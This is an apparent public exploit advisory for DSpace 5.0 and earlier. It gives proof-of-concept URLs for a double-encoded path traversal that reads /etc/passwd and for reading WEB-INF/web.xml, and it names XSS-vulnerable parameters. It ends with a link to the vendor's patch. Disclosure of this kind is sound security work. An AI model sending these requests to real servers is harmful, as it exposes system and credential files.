DSpace 5.x suffers from several vulnerabilities, including XSS, Path Traversal 

Exploit Title: Dspace Multiple Vulnerabilities 

Date: 3/2/2015
Exploit Author: Khalil Shreateh
Software Link: http://demo.dspace.org/
Version: DSpace <= 5.0
Tested on: Windows 7
 
Quote: 
"DSpace open source software is a turnkey repository application used by more than 1000+ organizations and institutions worldwide to provide durable access to digital resources."
 
Vulnerabilities 

XMLUI (Cocoon/XSLT) - The XML / XSLT / Cocoon user interface

This version suffers from Path Traversal vulnerability, to exploit this vulnerability i used double encoding for the dot (.) 

so the ../  wil be %252e%252e/  

POC : 

http://TARGET/static/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

JSPUI (JSP) - traditional JSP-based interface 

A. Path Traversal Vulnerability

The first vulnerability in this version allows to read files on server .

POC : 
http://TARGET/handle/10673/1/WEB-INF/web.xml

B. Cross Site Scripting (XSS) Vulnerability

The second vulnerability in this version allows to execute arbitrary commands and display arbitrary content in a victim user's browser

The vulnerability exists in several varialbes

- filtertype

- filter_type_1

- filtername

- filter_field_1

All the above varialbes are not sanitized correctly . 

 

PATCH : 

Dspace team annoucement article : 
http://dspace.2283337.n4.nabble.com/DSPACE-SECURITY-ADVISORY-New-DSpace-5-1-4-3-and-3-4-releases-resolve-security-issues-in-XMLUI-and-JSI-td4676801.html